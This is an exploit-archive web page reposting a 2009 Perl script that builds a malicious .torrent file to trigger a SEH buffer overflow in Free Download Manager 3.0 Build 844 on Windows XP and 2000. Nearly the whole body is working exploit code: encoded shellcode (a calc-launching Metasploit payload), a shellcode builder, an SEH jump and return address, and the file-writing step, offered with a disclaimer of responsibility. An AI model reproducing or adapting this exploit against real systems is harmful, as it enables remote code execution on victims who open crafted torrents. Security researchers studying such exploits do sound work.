首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
来源:skdrat@hotmail.com 作者:SkD 发布时间:2009-02-04  

#!/usr/bin/perl
#
# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
# -----------------------------------------------------------
# Exploit by SkD     (skdrat@hotmail.com)
#
# Vendors URL =
# [www.freedownloadmanager.org]
# Download FDM 3.0 Build 844 =
# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
# (Downloaded by over 1.6 million users!)
#
# This is another one of the more advanced exploitation methods
# for buffer overflows using my method called "shell building".
# It utilizes a SEH overflow and then a shellcode builder/assembler
# "builds"/or "assembles" bytes that were deleted by transformation
# of the buffer so that the shellcode will work without a flaw.
# I have been able to do this because of my recent experiences with
# UNICODE based overflows (heap & stack). This is a demonstration
# of how you can obtain power with limitations to buffer.
# Of course I could have used my shellhunting technique,
# but this is a new method, and to demonstrate it in a world of
# dying buffer overflows is important for me.
#
# Unfortunately I did not have time to make this a universal exploit
# so it will only work on all NT systems EXCEPT Vista (due to randomized
# heap, etc). But with a few modifications it can work (sure of it).
# Read my notes & comments in the script for more info.
#
# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
#
# Note: Author has no responsibility over the damage you do with this!

use strict;
use warnings;

my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".
      "\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20".
      "\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68".
      "\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A";
my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".
      "\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65";

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49".
#Notice I added 0x01 byte before each 0x80=> byte.
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37".
"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a".
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53".
"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37".
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59".
"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x36\x43\x46\x42\x30\x5a";

#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
#0x01 before each 0x80=> byte.
my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).
   ("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).
                        ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
                        ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
                        ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).
                        ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");
my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack                    #and set everything in the right places(ret,addr,etc).
my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
my $overflow1 = "\x41" x 10000;
my $overflow2 = "\x41" x $len;
my $sled = "\x41" x (350 - length($shellcode_builder));
my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)
my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)

open(my $torrent, "> s.torrent");
print $torrent $tdata1.
        $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.
               $tdata2;
close $torrent;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CMS from Scratch <= 1.9.1 (fck
·Euphonics Audio Player v1.0 (.
·KIS 2008 and Kaspersky AntiVir
·WEBalbum 2.4b (photo.php id) B
·OpenHelpDesk 1.0.100 eval() Co
·Hex Workshop v6 (ColorMap file
·phpslash <= 0.8.1.1 Remote Cod
·TxtBlog 1.0 Alpha Remote Comma
·eVision CMS 2.0 Remote Code Ex
·DreamPics Photo/Video Gallery
·CMS Mini <= 0.2.2 Remote Comma
·win32/xp sp2 Shellcode cmd.exe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved